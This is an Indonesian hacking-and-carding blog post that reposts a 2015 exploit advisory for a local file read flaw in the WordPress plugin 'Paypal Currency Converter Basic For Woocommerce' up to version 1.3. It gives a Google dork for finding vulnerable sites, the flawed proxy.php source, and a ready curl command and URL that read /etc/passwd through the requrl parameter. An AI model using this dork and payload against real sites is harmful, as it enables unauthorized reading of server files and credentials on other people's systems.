WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read - Hallo sahabat Hacking-Carding, Pada sharing kali ini yang berjudul WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read ,mudah-mudahan isi postingan ini dapat anda pahami. okelah, ini dia.

Judul : WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read

WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read

# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link:
https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux
 Description:
 proxy.php's code:

<?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>


Based on user input, the content of a file is printed out (unfortunately
not included) so any html file can be loaded, and an attacker may be able
to read  any local file which
is not executed in the server.


Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
POC:
curl --silent --url
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd

Demikianlah Artikel WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read

Sekian artikel WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read , mudah-mudahan bisa memberi manfaat untuk anda semua. baiklah, sekian postingan kali ini.

Artikel ini url permalinknya adalah https://rumahhackingv2.blogspot.com/2015/12/wordpress-paypal-currency-converter.html Semoga artikel ini bisa bermanfaat.